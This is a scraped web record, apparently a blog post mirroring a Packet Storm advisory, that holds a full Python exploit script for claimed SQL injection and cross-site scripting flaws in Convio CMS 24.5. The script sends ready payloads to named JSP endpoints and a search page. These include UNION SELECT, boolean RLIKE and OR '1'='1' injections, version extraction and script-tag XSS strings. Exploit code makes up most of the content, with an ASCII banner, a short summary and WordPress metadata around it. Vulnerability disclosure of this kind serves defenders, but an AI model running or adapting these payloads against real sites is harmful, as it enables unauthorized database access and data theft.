{“lastseen”:”2025-12-11T17:25:24″,”description”:”Convio CMS version 24.5 proof of concept remote SQL injection exploit…”,”published”:”2025-12-11T00:00:00″,”modified”:”2025-12-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Convio CMS 24.5 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212725″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Convio CMS v 24.5 SQL Injection Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : http:\/\/www.convio.com |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/182998\/\\n \\n \\n [+] Summary : \\n Multiple critical SQL injection vulnerabilities were discovered in Convio CMS version 24.5 affecting various application endpoints. \\n \\t\\t\\t These vulnerabilities allow authenticated attackers to execute arbitrary SQL commands, potentially leading to complete database compromise, authentication bypass, and unauthorized data access.\\n \\t\\t\\t The vulnerabilities exist due to improper input validation and lack of parameterized queries in multiple JSP endpoints. Attackers can inject malicious SQL code through various parameters, \\n \\t\\t\\t allowing direct database manipulation and information disclosure.\\n \\n \\n \\n [+] POC : python poc.py\\n \\n python 1.py -u http:\/\/127.0.0.1\/ –test-all\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n Convio CMS SQL Injection Exploit\\n Authenticated Persistent SQL Injection\\n Researcher: indoushka\\n \\”\\”\\”\\n \\n import requests\\n import sys\\n import urllib3\\n from argparse import ArgumentParser\\n \\n # Disable SSL warnings\\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n class ConvioCMSExploit:\\n def __init__(self, target, verbose=False):\\n self.target = target.rstrip(‘\/’)\\n self.verbose = verbose\\n self.session = requests.Session()\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n ‘Accept’: ‘text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8’,\\n ‘Accept-Language’: ‘en-US,en;q=0.5’,\\n ‘Connection’: ‘keep-alive’\\n })\\n \\n def log(self, message, level=\\”INFO\\”):\\n colors = {\\n \\”INFO\\”: \\”\\\\033[94m\\”,\\n \\”SUCCESS\\”: \\”\\\\033[92m\\”,\\n \\”WARNING\\”: \\”\\\\033[93m\\”,\\n \\”ERROR\\”: \\”\\\\033[91m\\”,\\n \\”RESET\\”: \\”\\\\033[0m\\”\\n }\\n print(f\\”{colors.get(level, ”)}[{level}] {message}{colors[‘RESET’]}\\”)\\n \\n def test_sql_injection(self, url, payload, detection_string=None):\\n \\”\\”\\”Test SQL injection vulnerability\\”\\”\\”\\n try:\\n if self.verbose:\\n self.log(f\\”Testing URL: {url}\\”, \\”INFO\\”)\\n \\n response = self.session.get(url, verify=False, timeout=10)\\n \\n if detection_string:\\n if detection_string in response.text:\\n return True, response\\n else:\\n # Check for generic SQL error patterns\\n sql_errors = [\\n \\”sql\\”, \\”SQL\\”, \\”database\\”, \\”Database\\”, \\n \\”syntax\\”, \\”Syntax\\”, \\”mysql\\”, \\”MySQL\\”,\\n \\”ora-\\”, \\”ORA-\\”, \\”microsoft\\”, \\”Microsoft\\”\\n ]\\n if any(error in response.text for error in sql_errors):\\n return True, response\\n \\n return False, response\\n \\n except Exception as e:\\n self.log(f\\”Error testing {url}: {str(e)}\\”, \\”ERROR\\”)\\n return False, None\\n \\n def exploit_index_jsp(self):\\n \\”\\”\\”Exploit index.jsp SQL injection\\”\\”\\”\\n self.log(\\”Testing index.jsp SQL injection…\\”, \\”INFO\\”)\\n \\n payloads = [\\n \\”2′ RLIKE (SELECT (CASE WHEN (7273121=7273121) THEN 0x74657374696E70757476616C7565 ELSE 0x28 END))–\\”,\\n \\”2′ AND 1=1–\\”,\\n \\”2′ AND 1=2–\\”,\\n \\”2′ UNION SELECT NULL,NULL,NULL–\\”,\\n \\”2′ OR ‘1’=’1\\”\\n ]\\n \\n vulnerable = False\\n for payload in payloads:\\n test_url = f\\”{self.target}\/about\/news\/index.jsp?page={payload}\\”\\n is_vulnerable, response = self.test_sql_injection(test_url, payload)\\n \\n if is_vulnerable:\\n self.log(f\\”Vulnerable payload: {payload}\\”, \\”SUCCESS\\”)\\n vulnerable = True\\n break\\n \\n return vulnerable\\n \\n def exploit_session_status_jsp(self):\\n \\”\\”\\”Exploit session-status.jsp SQL injection\\”\\”\\”\\n self.log(\\”Testing session-status.jsp SQL injection…\\”, \\”INFO\\”)\\n \\n payloads = [\\n \\”99999999\/**\/OR\/**\/5563379=5563379–\\”,\\n \\”1715702042268’\/**\/RLIKE\/**\/(case\/**\/when\/**\/\/**\/4007635=4007635\/**\/then\/**\/0x74657374696E70757476616C7565\/**\/else\/**\/0x28\/**\/end)\/**\/and\/**\/ ‘%’=’\\”,\\n \\”1’ OR ‘1’=’1′–\\”,\\n \\”1′ UNION SELECT version(),2,3–\\”\\n ]\\n \\n vulnerable = False\\n for payload in payloads:\\n test_url = f\\”{self.target}\/system\/auth\/session-status.jsp?nocache={payload}\\”\\n is_vulnerable, response = self.test_sql_injection(test_url, payload)\\n \\n if is_vulnerable:\\n self.log(f\\”Vulnerable payload: {payload}\\”, \\”SUCCESS\\”)\\n vulnerable = True\\n break\\n \\n return vulnerable\\n \\n def exploit_search_xss(self):\\n \\”\\”\\”Test XSS in search functionality\\”\\”\\”\\n self.log(\\”Testing XSS in search functionality…\\”, \\”INFO\\”)\\n \\n xss_payloads = [\\n \\”\\u003cscript\\u003ealert(‘XSS’)\\u003c\/script\\u003e\\”,\\n \\”\\u003cimg src=x onerror=alert(1)\\u003e\\”,\\n \\”‘\\\\\\”\\u003e\\u003cscript\\u003ealert(1)\\u003c\/script\\u003e\\”,\\n \\”javascript:alert(‘XSS’)\\”\\n ]\\n \\n vulnerable = False\\n for payload in xss_payloads:\\n test_url = f\\”{self.target}\/search\/?q={payload}\\”\\n response = self.session.get(test_url, verify=False, timeout=10)\\n \\n if payload in response.text:\\n self.log(f\\”XSS vulnerable: {payload}\\”, \\”SUCCESS\\”)\\n vulnerable = True\\n break\\n \\n return vulnerable\\n \\n def advanced_exploitation(self):\\n \\”\\”\\”Advanced SQL injection exploitation\\”\\”\\”\\n self.log(\\”Attempting advanced exploitation…\\”, \\”INFO\\”)\\n \\n # Database version extraction\\n version_payloads = [\\n \\”2′ UNION SELECT version(),NULL,NULL–\\”,\\n \\”2′ UNION SELECT @@version,NULL,NULL–\\”,\\n \\”2′ AND extractvalue(rand(),concat(0x3a,version()))–\\”\\n ]\\n \\n for payload in version_payloads:\\n test_url = f\\”{self.target}\/about\/news\/index.jsp?page={payload}\\”\\n is_vulnerable, response = self.test_sql_injection(test_url, payload, \\”MySQL\\”)\\n \\n if is_vulnerable and any(keyword in response.text for keyword in [\\”5.7\\”, \\”8.0\\”, \\”10.\\”, \\”MariaDB\\”]):\\n self.log(\\”Database version potentially exposed\\”, \\”SUCCESS\\”)\\n # Extract version from response\\n lines = response.text.split(‘\\\\n’)\\n for line in lines:\\n if any(ver in line for ver in [\\”5.7\\”, \\”8.0\\”, \\”10.\\”]):\\n self.log(f\\”Possible version info: {line[:100]}\\”, \\”INFO\\”)\\n break\\n \\n def run_comprehensive_test(self):\\n \\”\\”\\”Run comprehensive vulnerability test\\”\\”\\”\\n self.log(f\\”Starting comprehensive test for: {self.target}\\”, \\”INFO\\”)\\n \\n results = {\\n ‘index_jsp_sqli’: False,\\n ‘session_status_sqli’: False,\\n ‘search_xss’: False\\n }\\n \\n # Test index.jsp SQLi\\n results[‘index_jsp_sqli’] = self.exploit_index_jsp()\\n \\n # Test session-status.jsp SQLi\\n results[‘session_status_sqli’] = self.exploit_session_status_jsp()\\n \\n # Test search XSS\\n results[‘search_xss’] = self.exploit_search_xss()\\n \\n # Advanced exploitation if SQLi found\\n if results[‘index_jsp_sqli’] or results[‘session_status_sqli’]:\\n self.advanced_exploitation()\\n \\n # Print summary\\n self.log(\\”=== EXPLOITATION SUMMARY ===\\”, \\”INFO\\”)\\n for vuln, status in results.items():\\n status_str = \\”VULNERABLE\\” if status else \\”NOT VULNERABLE\\”\\n color = \\”SUCCESS\\” if status else \\”ERROR\\”\\n self.log(f\\”{vuln}: {status_str}\\”, color)\\n \\n return any(results.values())\\n \\n def main():\\n banner = \\”\\”\\”\\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557\\n \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\\n \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u255a\u2588\u2588\u2557 \u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\\n \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \\n \\n Convio CMS SQL Injection Exploit\\n Researcher: indoushka\\n \\”\\”\\”\\n print(banner)\\n \\n parser = ArgumentParser(description=’Convio CMS SQL Injection Exploit’)\\n parser.add_argument(‘-u’, ‘–url’, required=True, help=’Target URL (e.g., https:\/\/example.com)’)\\n parser.add_argument(‘-v’, ‘–verbose’, action=’store_true’, help=’Enable verbose output’)\\n parser.add_argument(‘–test-all’, action=’store_true’, help=’Test all vulnerability types’)\\n \\n args = parser.parse_args()\\n \\n exploit = ConvioCMSExploit(args.url, args.verbose)\\n \\n try:\\n if exploit.run_comprehensive_test():\\n exploit.log(\\”Target appears to be vulnerable!\\”, \\”SUCCESS\\”)\\n else:\\n exploit.log(\\”No vulnerabilities detected\\”, \\”WARNING\\”)\\n \\n except KeyboardInterrupt:\\n exploit.log(\\”Exploitation interrupted by user\\”, \\”ERROR\\”)\\n sys.exit(1)\\n except Exception as e:\\n exploit.log(f\\”Unexpected error: {str(e)}\\”, \\”ERROR\\”)\\n sys.exit(1)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212725″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212725\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-11T17:25:24″,”description”:”Convio CMS version 24.5 proof of concept remote SQL injection exploit…”,”published”:”2025-12-11T00:00:00″,”modified”:”2025-12-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Convio CMS 24.5 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212725″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Convio CMS v 24.5 SQL…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-30430","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n